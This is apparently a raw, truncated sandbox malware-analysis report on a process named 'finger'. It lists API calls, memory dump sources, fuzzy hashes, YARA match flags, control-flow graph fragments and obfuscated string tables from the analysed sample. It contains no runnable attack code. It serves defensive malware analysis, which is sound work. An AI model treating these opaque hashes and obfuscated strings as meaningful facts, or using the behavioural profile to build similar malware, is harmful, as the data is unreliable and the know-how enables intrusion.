                                                                                              • Instruction Fuzzy Hash: D09002A1702C0803E140B5DC9804607044587E0302F55C011A2064555E8B298D516135
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 890f3960cf126588216944cb3878092931507f4f1a5fe9eb9eab2d78cf10d0b6
                                                                                              • Instruction ID: 84f161529564ff01577915f0755942248f3f274dbd8fa7a2924a3bda0b66804d
                                                                                              • Opcode Fuzzy Hash: 890f3960cf126588216944cb3878092931507f4f1a5fe9eb9eab2d78cf10d0b6
                                                                                              • Instruction Fuzzy Hash: 2090026971380402E180B1DCA40860A044587E1202F95D415A0015558CCA1589695321
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f80d497db28b74d7f86a7f84a3b5b7a11d10be3e0f523b04935d9fd330fa834c
                                                                                              • Instruction ID: ef3dfbe931edf5a2c55f4da43b569f33f4ba8e58d498295d9491ec8ba08ab6c2
                                                                                              • Opcode Fuzzy Hash: f80d497db28b74d7f86a7f84a3b5b7a11d10be3e0f523b04935d9fd330fa834c
                                                                                              • Instruction Fuzzy Hash: A490026170280403E140B1DCA4186064445D7F1301F55D011E0414554CDA1589565222
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02880FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 518 2880f69-2880f80 520 2880f89-2880fde call 289c170 call 2884700 call 28713e0 call 2891e40 518->520 521 2880f84 call 289b760 518->521 530 2881000-2881005 520->530 531 2880fe0-2880ff1 PostThreadMessageW 520->531 521->520 531->530 532 2880ff3-2880ffd 531->532 532->530
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02880FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 533 2880f70-2880f80 534 2880f89-2880fde call 289c170 call 2884700 call 28713e0 call 2891e40 533->534 535 2880f84 call 289b760 533->535 544 2881000-2881005 534->544 545 2880fe0-2880ff1 PostThreadMessageW 534->545 535->534 545->544 546 2880ff3-2880ffd 545->546 546->544
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 02880FED
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02893D4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID: net.dll$wininet.dll
                                                                                              • API String ID: 3472027048-1269752229
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: InitializeUninitialize
                                                                                              • String ID: @J7<
                                                                                              • API String ID: 3442037557-2016760708
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02884772
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID: &cE}
                                                                                              • API String ID: 2234796835-1295445062
                                                                                              • Opcode ID: a2d3d48aabd28925619e736efd6220602dd56ff2303de9b8373dd2c8badc9a7f
                                                                                              • Instruction ID: 8e33b3fda170057921ae6355e944ae1370f105225ef3bfa7c7c089e38446dd8c
                                                                                              • Opcode Fuzzy Hash: a2d3d48aabd28925619e736efd6220602dd56ff2303de9b8373dd2c8badc9a7f
                                                                                              • Instruction Fuzzy Hash: ED31A67FB4428AABDB15EF78CC42BAA77A8EB41744F4801DCE809CB046E7309514CB91
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02884772
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID:
                                                                                              • API String ID: 2234796835-0
                                                                                              • Opcode ID: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                              • Instruction ID: fb3dfa36f0754cecc0d6f5cd635d1bd748fbd7dc722c491860e728f82b903cd1
                                                                                              • Opcode Fuzzy Hash: 56521a4f42ae9fa4dd1f48ddcc66fa5ad703c4b222d6c0bc46afaba39208bf64
                                                                                              • Instruction Fuzzy Hash: 76011EBED4020EABDF10EBE4DC41FADB3B99B44708F5441A5A90DD7280F631E7148B92
                                                                                              APIs
                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,028884CE,00000010,?,?,?,00000044,?,00000010,028884CE,?,00000000,?), ref: 02899A60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInternalProcess
                                                                                              • String ID:
                                                                                              • API String ID: 2186235152-0
                                                                                              • Opcode ID: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                                                              • Instruction ID: 03d52f1b8a51b3c2da7bf3397a162e934b266501e0500e2de3f2c49e43e9cb16
                                                                                              • Opcode Fuzzy Hash: 3473fbc84f5de4e9ef638430524f151b17afe93dbc7687943e0913540f186df8
                                                                                              • Instruction Fuzzy Hash: 500180B6215108BBDB48DE99DC85EDB77AEAF8C754F448218BA0DE3240D630F9518BA4
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02879F05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                              • Instruction ID: 150b541b3b6f32638164a1ab9d951a1038e5b8ad7b0d0e128cef8a850cdeca4a
                                                                                              • Opcode Fuzzy Hash: db92189fec3a812eea8a9a67e111a15204625a2f2668b3669d1839d2361ad85c
                                                                                              • Instruction Fuzzy Hash: A8F0653B38030436E62065AD9C02FDB765DCB84765F180025F70CDA1C0E5A6B40146E5
                                                                                              APIs
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02879F05
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2422867632-0
                                                                                              • Opcode ID: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                                                              • Instruction ID: ee686121854e960578ee8a8b6139b726e50ce4f02c62bbcf13c2093bf7cb450a
                                                                                              • Opcode Fuzzy Hash: eb2a8d7799c11fcc7e0d595a5d483ba23fad3cd631e5b665474ae8614d04f02a
                                                                                              • Instruction Fuzzy Hash: 54F0657A24030036E631669A8C06FDB765DCFC5B50F140019F70CDA1C0D9A6B40086F5
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F84D8BFF,00000007,00000000,00000004,00000000,02883F8F,000000F4), ref: 028999B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 3298025750-0
                                                                                              • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                              • Instruction ID: 19abf3a1c91ba64da4a6318c96964fac53cee0e2c5182feb76970a5a7c1c4ca0
                                                                                              • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                              • Instruction Fuzzy Hash: 16E065BA200204BBDA14EF59DC45EAB37AEEF89710F008018F909A7241C670B8118BB5
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(02881C06,?,0289587B,02881C06,0289586F,0289587B,?,02881C06,0289586F,00001000,?,?,00000000), ref: 02899979
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                              • Instruction ID: b2e7da6d2a3bb6a162318a6bd5d0b68164de215971bf2265cff96954feee8345
                                                                                              • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                              • Instruction Fuzzy Hash: 2EE0657A2042047BDA14EE69EC45E9B37AEEFC9710F008019F908A7240DA31B8518BB5
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0288853C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                              • Instruction ID: 797ed09261f281b22e90921aed06fa2ef861efc7109d2f3996253658dd3e6d51
                                                                                              • Opcode Fuzzy Hash: 78caaeef33826840504e2043f515a6604d6ca5fe9c1b0a4c19f806850eb8d1c5
                                                                                              • Instruction Fuzzy Hash: 1BE086BD29030827EB247BA8DC45F66339DAB48738F584660B91DDB2C1E678FA414150
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 0288853C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                              • Instruction ID: 6b766fdcbad5595304aaddf068e6c3c2dd9815fab6c899fed3198cbe14c9e581
                                                                                              • Opcode Fuzzy Hash: 7b8680feeee384a9cde1c08f30642674778f21929240871f497dd4e73621c6e0
                                                                                              • Instruction Fuzzy Hash: DBE026FE48030827EB2037689E467AA32596B00338F2C0A64F82DDB1C3E23CD2824224
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02881EF0,028981AF,0289586F,02881EC0), ref: 02888333
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                              • Instruction ID: 1e0275e60689a96fd631bd4ea9b7a976f4eb9209ea2b8b96dda00011a5aa4b5f
                                                                                              • Opcode Fuzzy Hash: 47f843362389e76ecdee1559b75256e8c3984728e288a0686686b97d3bef1785
                                                                                              • Instruction Fuzzy Hash: 1CD05E793443063BEE00B6E8DC4AF5A328D8B00798F090074BA0CDA2C1E968F5004766
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 2bcb19666ee307c38e3defe088030996553f94cde5ce27ce4e7ba745eec5c2ce
                                                                                              • Instruction ID: 1b44982ae9062c7d80fa020e90303db859e69f63c1198453c4fe8d641b5b1eb0
                                                                                              • Opcode Fuzzy Hash: 2bcb19666ee307c38e3defe088030996553f94cde5ce27ce4e7ba745eec5c2ce
                                                                                              • Instruction Fuzzy Hash: 2AB09BB1D079C9D5FE51E7A456087177D4467D0701F19C462D2030651F4739D1D1F175
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                              • Instruction ID: c99130e307e22990fc48d1038e1324876e7f52c04dd11a21dc30b1c49a8fe4d3
                                                                                              • Opcode Fuzzy Hash: fa4e9dff2f25cf6ba25235a48aeeac25dcf03243747be0d05e8712814ae51cb3
                                                                                              • Instruction Fuzzy Hash: A541E671A1CB0D4FD368EF68948167AF3E2FF45350F50062EDA8AC7352EB70E8468685
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2870000_finger.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                              • Instruction ID: d3d539581343e5142ad3ad3cf6bc3a0fcff224ea494eead0084f88fe096c1baf
                                                                                              • Opcode Fuzzy Hash: 0865ff5424ecf9e77f91489767588841e59a8d48a04142e8af4d6f55970ecbfe
                                                                                              • Instruction Fuzzy Hash: CCC08033E6041591D3148D5CFC817F0F3E4D797325F047356D514D3144C11AF45146D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                              • API String ID: 0-3558027158
                                                                                              • Opcode ID: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                              • Instruction ID: d45c10cc55456b1e2803715b4c647ad88a9b12d2d57e808ca69733cd20130873
                                                                                              • Opcode Fuzzy Hash: 5a96c6284389f62c30a2dd4d636429b92f6a6b2938730354730b7adc21228ec2
                                                                                              • Instruction Fuzzy Hash: 0E9150F04482988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579534381.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_2f70000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -nu$ <91$434'$80zf$994z$9<>0$:<1u$;x &$<:;z$<z`f$>:|u$`{eu$anu0$a{a{$a{e{$b{fc$dmab$g{eu$z`fb${bcu${fcu
                                                                                              • API String ID: 0-2065742749
                                                                                              • Opcode ID: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                              • Instruction ID: 1e964edb20ba8b2d53abdb6e1158f836a9fd7585382245bc673592c4d887d9bd
                                                                                              • Opcode Fuzzy Hash: 9ae20cf4b4557e0ac6225483ce40d05f002ddf7f1f7b9f4d55118934c447bddd
                                                                                              • Instruction Fuzzy Hash: 1141F2B480478CEBCF18CF85D9416DEBB71FF05394F904159E9096F294C7758616CB89
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.000000000314D000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_3020000_finger.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                              • API String ID: 48624451-2108815105
                                                                                              • Opcode ID: df81b7881121f3e46e114281a37ff92426e3751765e9f637d9d1e1676c0aa039
                                                                                              • Instruction ID: 34c3ae5f7c2185c2715c4bbb1495f6084ddef1f04ab1bae48b596b28252314c4
                                                                                              • Opcode Fuzzy Hash: df81b7881121f3e46e114281a37ff92426e3751765e9f637d9d1e1676c0aa039
                                                                                              • Instruction Fuzzy Hash: 5C51E8B5A0215EBFDF10DB98888097FF7FCBB48200B14C9AAE4A5D7641D234DE509BE0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: true
                                                                                              • Associated: 00000007.00000002.3579576147.0000000003149000.00000040.00001000.00020000.00000000.sdmp
